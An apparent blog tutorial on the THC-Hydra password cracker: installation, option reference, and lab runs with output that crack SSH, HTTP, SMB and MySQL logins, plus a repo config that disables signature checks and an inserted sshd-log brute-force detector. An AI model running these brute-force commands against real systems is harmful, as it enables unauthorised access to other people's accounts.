thc-hydra brute-force password cracking
http://www.oracle.com/technetwork/database/features/instant-client/index.html
http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
Passwords are one of the biggest security holes, as every password security study shows. Hydra is a parallelized login cracker that supports numerous protocols. New modules are easy to add, and it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, and is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is proof-of-concept code, intended to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
OS X: brew install libssh openssl mysql gtk+ pkg-config libidn
telnet
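22:31:51. Note, friends: it took only 1 minute to brute-force such a complex password (alex/AleX210LEun). All I can say is that this machine rivals the Tianhe supercomputer; the username and password were both in the dictionary, after all!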
cat >/etc/yum.repos.d/epel7.repo <<HERE
[epel7]
name=epel
baseurl=http://mirrors.sohu.com/fedora-epel/7/x86_64/
# gpgcheck=0 turns off package signature verification for this repo
gpgcheck=0
enabled=1
HERE
yum -y install openssl-devel pcre-devel postgresql-devel \
    libssh-devel subversion-devel \
    ncurses-devel firebird-devel \
    libodb-mysql-devel openldap-devel \
    mariadb-devel afpfs-ng-devel   # (ncpfs-devel)
yum -y install hydra hydra-frontend
1. Install the build dependencies
cat >/etc/yum.repos.d/epel7.repo <<HERE
[epel7]
name=epel
baseurl=http://mirrors.sohu.com/fedora-epel/7/x86_64/
gpgcheck=0
enabled=1
HERE
yum -y install openssl-devel pcre-devel postgresql-devel \
    libssh-devel subversion-devel ncurses-devel \
    firebird-devel libodb-mysql-devel openldap-devel \
    mariadb-devel afpfs-ng-devel
SAP support requires downloading the matching version of the SDK from the official site; interested readers can give it a try.
install
root@jlive:hydra-8.1# ./configure
Starting hydra auto configuration …
Detected 64 Bit Linux OS
Checking for openssl (libssl, libcrypto, ssl.h, sha.h) …
… found
Checking for idn (libidn.so) …
… found
Checking for curses (libcurses.so / term.h) …
… found, color output enabled
Checking for pcre (libpcre.so, pcre.h) …
… found
Checking for Postgres (libpq.so, libpq-fe.h) …
… found
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) …
… found
Checking for firebird (libfbclient.so) …
… found
Checking for MYSQL client (libmysqlclient.so, math.h) …
… found
Checking for AFP (libafpclient.so) …
… found
Checking for NCP (libncp.so / nwcalls.h) …
… NOT found, module NCP disabled
Checking for SAP/R3 (librfc/saprfc.h) …
… NOT found, module sapr3 disabled
Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) …
… found
Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) …
… NOT found, module Oracle disabled
Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html
Checking for GUI req's (pkg-config, gtk+-2.0) …
… found
Checking for Android specialities …
… rindex() found
… RSA_generate_key() found
Checking for secure compile option support in gcc …
Compiling… yes
Linking… yes
Hydra will be installed into …/bin of: /usr/local
(change this by running ./configure --prefix=path)
Writing Makefile.in …
now type "make"
After installation, the following additional commands are available:
hydra hydra-wizard.sh xhydra
Usage examples
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT]
[-S] [-vV] server service [OPT]
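-R Resume cracking from where the previous session left off.
-S Connect using SSL.
-s PORT Specify a non-default port.
-l LOGIN Specify the user to crack, targeting one particular user.
-L FILE Specify a username dictionary.
-p PASS Lowercase; specify a single password to try. Rarely used, since a password dictionary is the usual choice.
-P FILE Uppercase; specify a password dictionary.
-e ns Optional. n: try an empty password; s: try the login name as the password.
-C FILE Use a colon-separated file, e.g. "login:password", instead of the -L/-P parameters.
-M FILE Specify a file listing the targets, one per line.
-o FILE Specify the output file for results.
-f When used with -M, stop as soon as the first login/password pair is found.
-t TASKS Number of threads to run in parallel, default 16.
-w TIME Maximum timeout in seconds, default 30s.
-v / -V Show verbose progress.
server The target IP
service The service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable
vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm]
pcanywhere teamspeak sip vmauthd firebird ncp afp, and so on.
OPT Optional, service-specific options
For the username and password dictionaries, you can use the word list that ships with Linux, /usr/share/dict/linux.words,
or use a wordlist generator such as crunch: http://sourceforge.net/projects/crunch-wordlist/files/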
tar -xvf crunch-3.6.tar.gz -C /usr/local/src
cd /usr/local/src/crunch-3.6
make -j4 && make -j4 install
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS]
[-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46]
[service://server[:PORT][/OPT]]
For example: hydra -L user.txt -P pw.txt mysql://192.168.130.254:3306
Or alternatively:
1. SSH cracking
root@jlive:~# hydra -l root -P pw.txt -t 4 -e nsr 192.168.130.254 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31 16:32:59
[DATA] max 4 tasks per 1 server, overall 64 tasks, 39 login tries (l:1/p:39), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.130.254 login: root password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31 16:33:02
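Hydra stops immediately once the correct password is found.
Graphical front end: xhydra
As you can see, the password was brute-forced successfully. Of course, this is only a test.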
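Seen from the target, the SSH run above appears in the sshd log as a burst of failed logins from one address followed by an accepted one. The detector below is an added example, not part of the original post; the log lines, the source address 192.168.130.1, the threshold and the window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (not from the original post): six failures in three
# seconds from one address, then a success; one unrelated failure elsewhere.
SAMPLE_LOG = "\n".join(
    [f"Jan 31 16:33:0{i // 2} jlive sshd[21{i}]: Failed password for root "
     f"from 192.168.130.1 port 4011{i} ssh2" for i in range(6)]
    + ["Jan 31 16:33:02 jlive sshd[2106]: Accepted password for root "
       "from 192.168.130.1 port 40116 ssh2",
       "Jan 31 16:40:10 jlive sshd[2190]: Failed password for alex "
       "from 192.168.130.7 port 51822 ssh2"])

# Matches the standard OpenSSH password-auth result lines in syslog format.
LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2016):
    """Return (kind, source, user, failures_in_window) alerts.

    'bruteforce' fires once per source when the threshold is first crossed;
    'compromise' fires when a login is accepted while the source is over it.
    """
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = set()                 # sources already reported as brute-forcing
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        stamp, result, user, src = m.groups()
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()        # drop failures that have left the window
        if result == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, user, len(recent)))
        elif len(recent) >= threshold:
            alerts.append(("compromise", src, user, len(recent)))
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The "compromise" alert is the one to page on: it means a guess succeeded, so the account's password should be rotated and the session investigated, not just the source blocked.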
2. HTTP
Basic authentication, GET method
root@jlive:~# hydra -l liujun -P pw.txt -t 4 -e nsr 192.168.130.254 http-get /nginx_status
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31 17:45:24
[DATA] max 4 tasks per 1 server, overall 64 tasks, 41 login tries (l:1/p:41), ~0 tries per task
[DATA] attacking service http-get on port 80
[80][http-get] host: 192.168.130.254 login: liujun password: LIUJUN
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31 17:45:24
3. SMB cracking
root@jlive:~# hydra -l liujun -P pw.txt 192.168.130.254 smb -s 445
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31 18:26:03
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 40 login tries (l:1/p:40), ~0 tries per task
[DATA] attacking service smb on port 445
[445][smb] host: 192.168.130.254 login: liujun password: ^LIUjun$90
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31 18:26:03
4. MySQL password cracking
root@jlive:~# hydra -L user.txt -P pw.txt 192.168.130.254 mysql -s 3306
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31 18:53:10
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 64 tasks, 80 login tries (l:2/p:40), ~0 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 192.168.130.254 login: jlive password: liujun
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31 18:53:10
Note: for demonstration purposes, the correct password was placed directly in the password list, which is why it was cracked so quickly.